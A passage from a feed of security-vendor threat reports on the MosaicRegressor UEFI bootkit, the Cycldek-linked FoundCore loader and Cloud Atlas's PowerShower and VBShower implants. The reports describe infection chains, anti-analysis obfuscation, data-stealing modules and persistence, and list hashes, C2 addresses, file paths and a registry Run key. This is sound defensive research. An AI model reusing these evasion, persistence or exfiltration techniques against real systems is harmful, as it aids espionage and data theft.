DLL files, most of them temporary.\n\nWe have observed one such library, "**load.rem**", that is a basic document stealer, fetching files from the "Recent Documents" directory and archiving them with a password, likely as a preliminary step before exfiltrating the result to the C&C by another component.\n\nThe following figure describes the full flow and connection between the components that we know about. The colored elements are the components that we obtained and gray ones are the ones we didn't:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142517/sl_MosaicRegressor_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142517/sl_MosaicRegressor_06.png>)\n\n**_Flow from BitsRegEx to execution of intermediate loaders and final payload_**\n\n \n\n## Who were the Targets?\n\nAccording to our telemetry, there were several dozen victims who received components from the MosaicRegressor framework between 2017 and 2019. These victims included diplomatic entities and NGOs in Africa, Asia and Europe. Only two of them were also infected with the UEFI bootkit in 2019, predating the deployment of the BitsReg component.\n\nBased on the affiliation of the discovered victims, we could determine that all had some connection to the DPRK, be it non-profit activity related to the country or actual presence within it. This common theme can be reinforced through one of the infection vectors used to deliver the malware to some of the victims, which was SFX archives pretending to be documents discussing various subjects related to North Korea. Those were bundled with both an actual document and MosaicRegressor variants, having both executed when the archive is opened. Examples for the lure documents can be seen below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142633/sl_MosaicRegressor_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142633/sl_MosaicRegressor_07.png>)\n\n_**Examples of lure documents bundled to malicious SFX archives sent to MosaicRegressor victims, discussing DPRK related topics**_\n\n \n\n## Who is behind the attack?\n\nWhen analyzing MosaicRegressor's variants, we noticed several interesting artefacts that provided us with clues on the identity of the actor behind the framework. As far as we can tell, the attacks were conducted by a Chinese-speaking actor, who may have previously used the Winnti backdoor. We found the following evidence to support this:\n\n * We spotted many strings used in the system information log generated by the BitsRegEx variant that contain the character sequence '0xA3, 0xBA'. This is an invalid sequence for a UTF8 string and the LATIN1 encoding translates these symbols to a pound sign followed by a "masculine ordinal indicator" ("\u00a3\u00ba"). An attempt to iterate over all available iconv symbol tables, trying to convert the sequence to UTF-8, produces possible candidates that give a more meaningful interpretation. Given the context of the string preceding the symbol and line feed symbols following it, the best match is the "FULL-WIDTH COLON" Unicode character translated from either the Chinese or Korean code pages (i.e. CP936 and CP949).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142816/sl_MosaicRegressor_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142816/sl_MosaicRegressor_08.png>)\n\n_Figure_: The BitsRegEx system information log making use of the character sequence 0xA3, 0xBA, likely used to represent a full-width colon, according to code pages CP936 and CP949.\n\n * Another artefact that we found was a file resource found in CurlReg samples that contained a language identifier set to 2052 ("zh-CN")\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142900/sl_MosaicRegressor_09.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142900/sl_MosaicRegressor_09.png>)\n\n**_Chinese language artefact in the resource section of a CurlReg sample_**\n\n * We detected an OLE2 object taken out of a document armed with the CVE-2018-0802 vulnerability, which was produced by the so-called 'Royal Road' / '8.t' document builder and used to drop a CurlReg variant. To the best of our knowledge, this builder is commonly used by Chinese-speaking threat actors.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142954/sl_MosaicRegressor_10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142954/sl_MosaicRegressor_10.png>)\n\n**_Excerpt from the OLE2 object found within a 'Royal Road' weaponized document, delivering the CurlReg variant_**\n\n * A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor's variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the 'Winnti umbrella and linked groups', according to a publicly available [report](<https://401trg.com/burning-umbrella/>). Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.\n\n## Conclusion\n\nThe attacks described in this blog post demonstrate the length an actor can go in order to gain the highest level of persistence on a victim machine. It is highly uncommon to see compromised UEFI firmware in the wild, usually due to the low visibility into attacks on firmware, the advanced measures required to deploy it on a target's SPI flash chip, and the high stakes of burning sensitive toolset or assets when doing so.\n\nWith this in mind, we see that UEFI continues to be a point of interest to APT actors, while at large being overlooked by security vendors. The combination of our technology and understanding of the current and past campaigns leveraging infected firmware, helps us monitor and report on future attacks against such targets.\n\nThe full details of this research, as well as future updates on the underlying threat actor, are available to customers of the APT reporting service through our Threat Intelligence Portal.\n\n## IoCs\n\nThe followings IoC list is not complete. If you want more information about the APT discussed here, a full IoC list and YARA rules are available to customers of Kaspersky Threat Intelligence Reports. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n**UEFI Modules **\n\nF5B320F7E87CC6F9D02E28350BB87DE6 (SmmInterfaceBase) \n0C136186858FD36080A7066657DE81F5 (SmmAccessSub) \n91A473D3711C28C3C563284DFAFE926B (SmmReset) \nDD8D3718197A10097CD72A94ED223238 (Ntfs)\n\n**RAR SFX droppers**\n\n0EFB785C75C3030C438698C77F6E960E \n12B5FED367DB92475B071B6D622E44CD \n3B3BC0A2772641D2FC2E7CBC6DDA33EC \n3B58E122D9E17121416B146DAAB4DB9D \n70DEF87D180616406E010051ED773749 \n7908B9935479081A6E0F681CCEF2FDD9 \nAE66ED2276336668E793B167B6950040 \nB23E1FE87AE049F46180091D643C0201 \nCFB072D1B50425FF162F02846ED263F9\n\n**Decoy documents**\n\n0D386EBBA1CCF1758A19FB0B25451AFE \n233B300A58D5236C355AFD373DABC48B \n449BE89F939F5F909734C0E74A0B9751 \n67CF741E627986E97293A8F38DE492A7 \n6E949601EBDD5D50707C0AF7D3F3C7A5 \n92F6C00DA977110200B5A3359F5E1462 \nA69205984849744C39CFB421D8E97B1F \nD197648A3FB0D8FF6318DB922552E49E\n\n**BitsReg**\n\nB53880397D331C6FE3493A9EF81CD76E \nAFC09DEB7B205EADAE4268F954444984 (64-bit)\n\n**BitsRegEx**\n\nDC14EE862DDA3BCC0D2445FDCB3EE5AE \n88750B4A3C5E80FD82CF0DD534903FC0 \nC63D3C25ABD49EE131004E6401AF856C \nD273CD2B96E78DEF437D9C1E37155E00 \n72C514C0B96E3A31F6F1A85D8F28403C\n\n**CurlReg**\n\n9E182D30B070BB14A8922CFF4837B94D \n61B4E0B1F14D93D7B176981964388291 \n3D2835C35BA789BD86620F98CBFBF08B\n\n**CurlRegEx**\n\n328AD6468F6EDB80B3ABF97AC39A0721 \n7B213A6CE7AB30A62E84D81D455B4DEA\n\n**MailReg**\n\nE2F4914E38BB632E975CFF14C39D8DCD\n\n**WinHTTP Based Downloaders**\n\n08ECD8068617C86D7E3A3E810B106DCE \n1732357D3A0081A87D56EE1AE8B4D205 \n74DB88B890054259D2F16FF22C79144D \n7C3C4C4E7273C10DBBAB628F6B2336D8\n\n**BitsReg Payload (FileA.z)**\n\n89527F932188BD73572E2974F4344D46\n\n**2nd Stage Loaders**\n\n36B51D2C0D8F48A7DC834F4B9E477238 (mapisp.dll) \n1C5377A54CBAA1B86279F63EE226B1DF (cryptui.sep) \n9F13636D5861066835ED5A79819AAC28 (cryptui.sep)\n\n**3rd Stage Payload**\n\nFA0A874926453E452E3B6CED045D2206 (load.rem)\n\n**File paths**\n\n%APPDATA%\\Microsoft\\Credentials\\MSI36C2.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\%Computername%.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\FileA.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileB.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileC.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileD.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileOutA.dat \n%APPDATA%\\Microsoft\\Network\\DFileA.dll \n%APPDATA%\\Microsoft\\Network\\DFileC.dll \n%APPDATA%\\Microsoft\\Network\\DFileD.dll \n%APPDATA%\\Microsoft\\Network\\subst.sep \n%APPDATA%\\Microsoft\\WebA.dll \n%APPDATA%\\Microsoft\\WebB.dll \n%APPDATA%\\Microsoft\\WebC.dll \n%APPDATA%\\Microsoft\\Windows\\LnkClass.dat \n%APPDATA%\\Microsoft\\Windows\\SendTo\\cryptui.sep \n%APPDATA%\\Microsoft\\Windows\\SendTo\\load.dll %APPDATA%\\Microsoft\\Windows\\load.rem \n%APPDATA%\\Microsoft\\Windows\\mapisp.dll \n%APPDATA%\\Microsoft\\exitUI.rs \n%APPDATA%\\Microsoft\\sppsvc.tbl \n%APPDATA%\\Microsoft\\subst.tbl \n%APPDATA%\\newplgs.dll \n%APPDATA%\\rfvtgb.dll \n%APPDATA%\\sdfcvb.dll \n%APPDATA%\\msreg.dll \n%APPDATA\\Microsoft\\dfsadu.dll \n%COMMON_APPDATA%\\Microsoft\\Windows\\user.rem \n%TEMP%\\BeFileA.dll \n%TEMP%\\BeFileC.dll \n%TEMP%\\RepairA.dll \n%TEMP%\\RepairB.dll \n%TEMP%\\RepairC.dll \n%TEMP%\\RepairD.dll \n%TEMP%\\wrtreg_32.dll \n%TEMP%\\wrtreg_64.dll \n%appdata%\\dwhost.exe \n%appdata%\\msreg.exe \n%appdata%\\return.exe \n%appdata%\\winword.exe\n\n**Domains and IPs**\n\n103.195.150[.]106 \n103.229.1[.]26 \n103.243.24[.]171 \n103.243.26[.]211 \n103.30.40[.]116 \n103.30.40[.]39 \n103.39.109[.]239 \n103.39.109[.]252 \n103.39.110[.]193 \n103.56.115[.]69 \n103.82.52[.]18 \n117.18.4[.]6 \n144.48.241[.]167 \n144.48.241[.]32 \n150.129.81[.]21 \n43.252.228[.]179 \n43.252.228[.]252 \n43.252.228[.]75 \n43.252.228[.]84 \n43.252.230[.]180 \nmenjitghyukl.myfirewall[.]org\n\n**Additional Suspected C&Cs**\n\n43.252.230[.]173 \n185.216.117[.]91 \n103.215.82[.]161 \n103.96.72[.]148 \n122.10.82[.]30\n\n**Mutexes**\n\nFindFirstFile Message Bi \nset instance state \nforegrounduu state \nsingle UI \nOffice Module \nprocess attach Module", "cvss3": {}, "published": "2020-10-05T10:00:45", "type": "securelist", "title": "MosaicRegressor: Lurking in the Shadows of UEFI", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-0802"], "modified": "2020-10-05T10:00:45", "id": "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "href": "https://securelist.com/mosaicregressor/98849/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-06T10:30:44", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/09133522/abstract-digital-bit-990x400.jpeg)\n\n## Introduction\n\nIn the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [sideloaded](<https://attack.mitre.org/techniques/T1574/002/>) by it, and an encoded payload, generally dropped from a self-extracting archive. Initially considered to be the signature of LuckyMouse, we observed other groups starting to use similar "triads" such as HoneyMyte. While it implies that it is not possible to attribute attacks based on this technique alone, it also follows that efficient detection of such triads reveals more and more malicious activity.\n\nThe investigation described in this article started with one such file which caught our attention due to the various improvements it brought to this well-known infection vector.\n\n## FoundCore Loader\n\nThis malware sample was discovered in the context of an attack against a high-profile organization located in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nAfter being loaded by a legitimate component from Microsoft Outlook (FINDER.exe, MD5 [9F1D6B2D45F1173215439BCC4B00B6E3](<https://opentip.kaspersky.com/9F1D6B2D45F1173215439BCC4B00B6E3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)), outlib.dll (MD5 [F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)) hijacks the intended execution flow of the program to decode and run a shellcode placed in a binary file, rdmin.src (MD5 [DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)). Such shellcodes that we had seen so far, however, did not involve any form of obfuscation. So, it was a rather unpleasant surprise for us when we discovered the first instructions:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140032/Cycldek_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140032/Cycldek_02.png>)\n\nExperienced reverse-engineers will immediately recognize disassembler-desynchronizing constructs in the screenshot above. The conditional jumps placed at offsets 7 and 9 appear to land in the middle of an address (as evidenced by the label loc_B+1), which is highly atypical for well-behaved assembly code. Immediately after, we note the presence of a call instruction whose destination (highlighted in red) is identified as bogus by IDA Pro, and the code that follows doesn't make any sense.\n\nExplaining what is going on requires taking a step back and providing a bit of background about how disassemblers work. At the risk of oversimplifying, flow-oriented disassemblers make a number of assumptions when processing files. One of them is that, when they encounter a conditional jump, they start disassembling the "false" branch first, and come back to the "true" branch later on. This process is better evidenced by looking at the opcodes corresponding to the code displayed above, again starting from offset 7:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140052/Cycldek_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140052/Cycldek_03.png>)\n\nIt is now more obvious that there are two ways to interpret the code above: the disassembler can either start from "E8", or from "81" \u2013 by default, IDA will choose the latter: E8 is in fact the opcode for the call instruction. But astute readers will notice that "JLE" (jump if lower or equal) and "JG" (jump if greater) are opposite conditions: no matter what, one of those will always be true and as such the actual code, as seen by the CPU during the execution, will start with the byte "81". Such constructs are called [opaque predicates](<https://en.wikipedia.org/wiki/Opaque_predicate>), and this E8 byte in the middle was only added there in order to trick the disassembler.\n\nDefeating this trick is but a trivial matter for IDA Pro, as it is possible to manually correct the disassembling mistake. However, it was immediately obvious that the shellcode had been processed by an automated obfuscation tool. Opaque predicates, sometimes in multiples, and dead code were inserted between every single instruction of the program. In the end, cleaning up the program automatically was the only practical approach, and we did so by modifying an [existing script](<https://github.com/RolfRolles/FinSpyVM/>) for the FinSpy malware family created by the respected reverse-engineer Rolf Rolles.\n\nThis step allowed us to discover the shellcode's purpose: to decrypt and decompress the final payload, using a combination of RC4 and LZNT1. Even then, it turned out that the attackers had more tricks up their sleeve. Normally, at this stage, one would have expected to find a PE file that the shellcode would load into memory. But instead, this is what we got:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140315/Cycldek_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140315/Cycldek_04.png>) \nThe recovered file was indeed a PE, but it turned out that most of its headers had been scrubbed. In fact, even the scarce ones remaining contained incoherent values \u2013 for instance, here, a number of declared sections equal to 0xAD4D. Since it is the shellcode (and not the Windows loader) that prepares this file for execution, it doesn't matter that some information, such as the magic numbers, is missing. As for the erroneous values, it turned out that the shellcode was fixing them on the fly using hardcoded operations:\n \n \n for ( i = 0; ; ++i ) // Iterate on the sections\n {\n // [...]\n // Stop when all sections have been read\n if ( i >= pe->pe_header_addr->FileHeader.NumberOfSections - 44361 )\n break;\n // [...]\n }\n\nFor instance, in the decompiled code above (as for all references to the file's number of sections) the value read in the headers is subtracted by 44361. For the attackers, the advantage is two-fold. First, it makes acquiring the final payload statically a lot more difficult for potential reverse-engineers. Second, it also ensures that the various components of the toolchain remain tightly coupled to each other. If only a single one of them finds itself uploaded to a multi-scanner website, it will be unexploitable for defenders. This is a design philosophy that we had observed from the LuckyMouse APT in the past, and is manifest in other parts of this toolchain too, as we will see later on. Eventually, we were able to reconstruct the file's headers and move on with our analysis \u2013 but we found this loader so interesting from an educational standpoint that we decided to base one track of our online reverse-engineering course on it. For more detailed steps on how we approached this sample, please have a look at [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>).\n\n## FoundCore payload\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Upon execution, this malware starts 4 threads:\n\n * The first one establishes persistence by creating a service.\n * The second one sets inconspicuous information for the service by changing its "Description", "ImagePath", "DisplayName" fields (among others).\n * The third sets an empty DACL (corresponding to the SDDL string "D:P") to the image associated to the current process in order to prevent access to the underlying malicious file.\n * Finally, a worker thread bootstraps execution and establishes connection with the C2 server. Depending on its configuration, it may also inject a copy of itself to another process.\n\nCommunications with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS. Commands supported by FoundCore include filesystem manipulation, process manipulation, screenshot captures and arbitrary command execution.\n\n## RoyalRoad documents, DropPhone and CoreLoader\n\nTaking a step back from the FoundCore malware family, we looked into the various victims we were able to identify to try to gather information about the infection process. In the vast majority of the incidents we discovered, it turned out that FoundCore executions were preceded by the opening of a malicious RTF documents downloaded from static.phongay[.]com. They all were generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempt to exploit CVE-2018-0802.\n\nInterestingly, while we would have expected them to contain decoy content, all of them were blank. We, therefore, hypothesize the existence of precursor documents, possibly delivered through spear-phishing, or precursor infections, which would trigger the download of one of these RTF files.\n\nSuccessful exploitation leads to the deployment of yet another malware that we named DropPhone:\n\n**MD5** | 6E36369BF89916ABA49ECA3AF59D38C6 \n---|--- \n**SHA1** | C477B50AE66E7228164930117A7D36C53713A5F2 \n**SHA256** | F50AE4B25B891E95B57BD4391AEB629437A43664034630D593EB9846CADC9266 \n**Creation time** | 2020-11-04 09:14:22 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 56 KB \n \nThis C++ implant also comes in the form of a legitimate executable (DeElevate.exe, from the publisher StarDock) and a side-loaded DLL (DeElevator.dll). At this stage, we are left with more questions than answers when it comes to it. DropPhone fetches a file saved as data.dat from hxxps://cloud.cutepaty[.]com, but we were unable to obtain a copy of this file so far. Next, it expects to find a companion program in %AppData%\\Microsoft\\Installers\\sdclt.exe, and will eventually terminate execution if it cannot find it.\n\nOur hypothesis is that this last file could be an instance or variant of CoreLoader (which we will describe in a minute), but the only piece of data supporting this theory that we have at our disposal is that we found CoreLoader in this folder in a single occurrence.\n\nDropPhone launches sdclt.exe, then collects environment information from the victim machine and sends it to DropBox. The last thing this implant does is delete data.dat without ever accessing its contents. We speculate that they are consumed by sdclt.exe, and that this is another way to lock together the execution of two components, frustrating the efforts of the reverse-engineers who are missing pieces of the puzzle \u2013 as is our case here.\n\n**MD5** | 1234A7AACAE14BDD94EEE6F44F7F4356 \n---|--- \n**SHA1** | 34977E351C9D0E9155C6E016669A4F085B462762 \n**SHA256** | 492D3B5BEB89C1ABF88FF866D200568E9CAD7BB299700AA29AB9004C32C7C805 \n**Creation time** | 2020-11-21 03:47:14 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 66 KB \n \nFinally, CoreLoader, the last malware we found associated to this set of activity, is a simple shellcode loader which performs anti-analysis and loads additional code from a file named WsmRes.xsl. Again, this specific file eluded our attempts to catch it but we suspect it to be, one way or another, related to FoundCore (described in the previous section).\n\nOverall, our current understanding of this complex toolchain is as follows. Dashed lines represent the components and links we are inferring, striped boxes represent the files we could not acquire.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\n## Victimology and attribution\n\nWe observed this campaign between June 2020 and January 2021. According to our telemetry, dozens of organizations were affected. 80% of them are based in Vietnam and belong to the government or military sector, or are otherwise related to the health, diplomacy, education or political verticals. We also identified occasional targets in Central Asia and in Thailand.\n\nFor the reasons laid-out in the introduction, attribution based on tooling alone is risky when it comes to this nebula. At first glance, the use of a "triad", the general design philosophy and the obvious effort spent to make reverse-engineering as complex as possible are reminiscent of LuckyMouse. However, we also observed code similarities between CoreLoader or FoundCore and programs associated with the Cycldek threat actor \u2013 namely, RedCore Loader (MD5: [1B6BCBB38921CAF347DF0A21955771A6](<https://opentip.kaspersky.com/1B6BCBB38921CAF347DF0A21955771A6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)).\n\nWhile Cycldek was, so far, considered to be one of the lesser sophisticated threat actors from the Chinese-speaking nexus, its targeting is known to be consistent with what we observed in this campaign. Therefore, we are linking the activities described in this post with Cycldek with low confidence.\n\n## Conclusion\n\nNo matter which group orchestrated this campaign, it constitutes a significant step up in terms of sophistication. The toolchain presented here was willfully split into a series of interdependent components that function together as a whole. Single pieces are difficult \u2013 sometimes impossible \u2013 to analyze in isolation, because they rely on code or data provided at other stages of the infection chain. We regretfully admit that this strategy was partly successful in preventing us from obtaining a complete picture of this campaign. As such, this report is as much about the things we know as it is about figuring out what we don't. We hereby extend our hand to fellow researchers who might be seeing other pieces of this vast puzzle, because we strongly believe that the challenges ahead of us can only be overcome through information sharing among trusted industry partners.\n\nSome readers from other regions of the world might dismiss this local activity as irrelevant to their interests. We would advise them to take heed. Experience shows that regional threat actors sometimes widen their area of activity as their operational capabilities increase, and that tactics or tools are vastly shared across distinct actors or intrusion-sets that target different regions. Today, we see a group focused on South-East Asia taking a major leap forward. Tomorrow, they may decide they're ready to take on the whole world.\n\n## Indicators of Compromise\n\n**File Hashes**\n\n[F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore malicious DLL (outllib.dll) \n---|--- \n[DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore companion file (rdmin.src) \n[6E36369BF89916ABA49ECA3AF59D38C6](<https://opentip.kaspersky.com/6E36369BF89916ABA49ECA3AF59D38C6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone \n[60095B281E32DAD2B58A10005128B1C3](<https://opentip.kaspersky.com/60095B281E32DAD2B58A10005128B1C3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | Malicious RTF document \n[1234A7AACAE14BDD94EEE6F44F7F4356](<https://opentip.kaspersky.com/1234A7AACAE14BDD94EEE6F44F7F4356/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | CoreLoader \n \n**Domains**\n\n[phong.giaitrinuoc[.]com](<https://opentip.kaspersky.com/phong.giaitrinuoc.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore C2 \n---|--- \n[cloud.cutepaty[.]com](<https://opentip.kaspersky.com/cloud.cutepaty.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone C2 \n[static.phongay[.]com](<https://opentip.kaspersky.com/static.phongay.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | RTF document stager", "cvss3": {}, "published": "2021-04-05T10:00:22", "type": "securelist", "title": "The leap of a Cycldek-related threat actor", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-0802"], "modified": "2021-04-05T10:00:22", "id": "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "href": "https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-12T19:33:22", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12093813/abstract-cloud-990x400.jpg)\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B 